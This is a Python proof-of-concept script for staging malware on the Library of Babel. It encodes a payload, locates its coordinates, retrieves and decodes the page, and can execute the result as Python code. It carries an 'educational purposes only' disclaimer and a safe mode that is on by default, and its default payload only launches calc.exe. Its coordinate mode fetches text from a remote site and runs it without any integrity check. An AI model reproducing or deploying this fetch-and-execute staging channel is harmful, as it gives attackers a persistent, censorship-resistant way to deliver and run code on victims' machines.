#!/usr/bin/env python3
"""
Proof of Concept: Malware Staging via Library of Babel
This script demonstrates how malicious payloads can be stored and retrieved
from the Library of Babel, providing a persistent and censorship-resistant
storage mechanism for malware staging.
WARNING: This is for educational purposes only. Do not use for malicious purposes.
"""
import sys
import argparse
import subprocess
from typing import Optional
import babel
import encoder
def log(message, level="INFO"):
    """Print *message* to stdout, prefixed with its bracketed severity *level*."""
    line = "[{}] {}".format(level, message)
    print(line)
def encode_and_search(payload):
    """Encode *payload* into Babel text and look up where that text is located.

    Args:
        payload (str): The text to encode and search for.

    Returns:
        tuple: ``(encoded, hex_id, wall, shelf, volume, page)`` when the search
        yields a hexagon id. A tuple of six ``None`` values when the search
        returns no hexagon id, or when ``ValueError`` or ``babel.SearchError``
        is raised along the way.
    """
    nothing_found = (None,) * 6
    try:
        log("Encoding payload to Babel format...")
        babel_text = encoder.encode_to_babel(payload)

        # Only the first 100 characters of the encoded text are echoed.
        ellipsis = "..." if len(babel_text) > 100 else ""
        log(f"Encoded payload: {babel_text[:100]}{ellipsis}")

        log("Searching in Library of Babel...")
        hex_id, wall, shelf, volume, page = babel.search(babel_text)
        if hex_id:
            log(f"Location found: hex={hex_id}, wall={wall}, shelf={shelf}, vol={volume}, page={page}")
            return babel_text, hex_id, wall, shelf, volume, page

        log("Search failed: payload not found", "ERROR")
        return nothing_found
    except ValueError as exc:
        # Reported as an encoding problem, although any ValueError raised
        # inside the try block (including a failed unpack) lands here.
        log(f"Encoding error: {exc}", "ERROR")
        return nothing_found
    except babel.SearchError as exc:
        log(f"Search error: {exc}", "ERROR")
        return nothing_found
def retrieve_and_decode(hex_id, wall, shelf, volume, page):
    """Fetch the page at the given coordinates and decode its text.

    Args:
        hex_id (str): Hexagon identifier.
        wall (str): Wall number.
        shelf (str): Shelf number.
        volume (str): Volume number.
        page (str): Page number.

    Returns:
        str: The decoded text, or ``None`` when the browse call returns
        nothing or raises ``babel.ValidationError`` / ``babel.BrowseError``.
        Any other exception propagates to the caller.
    """
    try:
        log("Retrieving from Library of Babel...")
        page_text = babel.browse(hex_id, wall, shelf, volume, page)
        if page_text:
            log(f"Retrieved {len(page_text)} characters")
            log("Decoding from Babel format...")
            plain_text = encoder.decode_from_babel(page_text)
            # NOTE(review): nothing in this function authenticates the
            # retrieved content; the decoded text is logged in full and
            # handed back exactly as the page supplied it.
            log(f"Decoded payload: {plain_text}")
            return plain_text

        log("Browse failed: no content retrieved", "ERROR")
        return None
    except babel.ValidationError as exc:
        log(f"Validation error: {exc}", "ERROR")
        return None
    except babel.BrowseError as exc:
        log(f"Browse error: {exc}", "ERROR")
        return None
def execute_payload(payload, safe_mode=True):
    """Show *payload*, or run it in a child Python interpreter.

    Args:
        payload (str): Python source text to show or run.
        safe_mode (bool): When true (the default) the payload is only logged
            and nothing is executed.

    Returns:
        str: Captured stdout of the child process when it ran to completion;
        ``None`` in safe mode, on timeout, or on any other exception.
    """
    if safe_mode:
        log("SAFE MODE: Would execute the following payload:", "WARNING")
        log(payload, "WARNING")
        return None

    # NOTE(review): from here on the text is run as code with the caller's
    # privileges and no sandboxing. The argument-list form means no shell is
    # involved, but the payload itself is arbitrary Python. In process
    # telemetry this shows up as a `python -c <inline code>` child process.
    argv = ["python", "-c", payload]
    try:
        log("Executing payload...", "WARNING")
        completed = subprocess.run(
            argv,
            capture_output=True,
            text=True,
            timeout=10,  # seconds; a longer-running child raises TimeoutExpired
        )
        captured_out = completed.stdout
        captured_err = completed.stderr
        if captured_out:
            log(f"Stdout: {captured_out}")
        if captured_err:
            log(f"Stderr: {captured_err}", "WARNING")
        return captured_out
    except subprocess.TimeoutExpired:
        log("Execution timed out", "ERROR")
        return None
    except Exception as exc:
        # Deliberately broad in the original: any launch failure is logged
        # and reported to the caller as None.
        log(f"Execution error: {exc}", "ERROR")
        return None
def demonstrate_staging(payload, execute=False):
    """Walk through encode/search, retrieve/decode, compare, then show or run.

    Stops early (after logging an error) when the search yields no hexagon
    id, when nothing is decoded, or when the decoded text differs from
    *payload*.

    Args:
        payload (str): The text to stage and round-trip.
        execute (bool): When false (the default) the final phase runs in
            safe mode and only prints the decoded text.
    """
    rule = "=" * 60
    log(rule)
    log("MALWARE STAGING DEMONSTRATION")
    log(rule)

    # Phase 1: encode the payload and find its coordinates.
    log("\n--- PHASE 1: Encode and Store ---")
    _encoded, hex_id, wall, shelf, volume, page = encode_and_search(payload)
    if not hex_id:
        log("Demonstration failed at encoding/search phase", "ERROR")
        return

    # Phase 2: fetch the page at those coordinates and decode it.
    log("\n--- PHASE 2: Retrieve and Decode ---")
    decoded = retrieve_and_decode(hex_id, wall, shelf, volume, page)
    if not decoded:
        log("Demonstration failed at retrieval/decode phase", "ERROR")
        return

    # The round-tripped text must equal the input before phase 3 is reached.
    if decoded != payload:
        for line in (
            "WARNING: Decoded payload does not match original!",
            f"Original: {payload}",
            f"Decoded: {decoded}",
        ):
            log(line, "ERROR")
        return
    log("Integrity check: PASSED")

    # Phase 3: safe mode unless the caller explicitly asked for execution.
    log("\n--- PHASE 3: Execute ---")
    execute_payload(decoded, safe_mode=not execute)

    log("\n" + rule)
    log("DEMONSTRATION COMPLETE")
    log(rule)
def main():
    """Parse the command line and run either coordinate retrieval or the demo.

    With ``--coordinates`` the page at those coordinates is retrieved, decoded
    and passed to ``execute_payload``; otherwise ``demonstrate_staging`` runs
    with ``--payload`` or the built-in default. Execution stays in safe mode
    unless ``--execute`` is given.
    """
    cli = argparse.ArgumentParser(
        description="Malware Staging PoC using Library of Babel",
        formatter_class=argparse.RawDescriptionHelpFormatter,
        epilog="""
Examples:
# Safe demonstration (no execution)
python main.py --payload "print('Hello, World!')"
# Actually execute the payload (DANGEROUS)
python main.py --payload "print('Hello, World!')" --execute
# Use default demonstration payload
python main.py
""",
    )
    cli.add_argument(
        "--payload",
        type=str,
        help="Python code to use as payload (default: calc.exe example)",
    )
    cli.add_argument(
        "--execute",
        action="store_true",
        help="Actually execute the payload (WARNING: dangerous!)",
    )
    cli.add_argument(
        "--coordinates",
        type=str,
        help="Retrieve from specific coordinates (format: hex,wall,shelf,volume,page)",
    )
    args = cli.parse_args()

    # Coordinate mode: retrieve from a given location instead of staging.
    if args.coordinates:
        try:
            parts = args.coordinates.split(",")
            if len(parts) != 5:
                log("Coordinates must be in format: hex,wall,shelf,volume,page", "ERROR")
                sys.exit(1)  # SystemExit is not an Exception, so it is not caught below
            hex_id, wall, shelf, volume, page = parts
            decoded = retrieve_and_decode(hex_id, wall, shelf, volume, page)
            # NOTE(review): this path has no original payload to compare
            # against, so with --execute the retrieved text is run without
            # the equality check that demonstrate_staging performs.
            if decoded:
                execute_payload(decoded, safe_mode=not args.execute)
        except Exception as exc:
            log(f"Error: {exc}", "ERROR")
            sys.exit(1)
        return

    # Fall back to the built-in demonstration payload when none was supplied.
    payload = args.payload
    if payload is None:
        payload = "import subprocess; subprocess.Popen('calc.exe')"
        log("Using default payload (calc.exe)", "INFO")

    demonstrate_staging(payload, execute=args.execute)
# Run the command-line interface only when this file is executed as a script,
# not when it is imported as a module.
if __name__ == "__main__":
    main()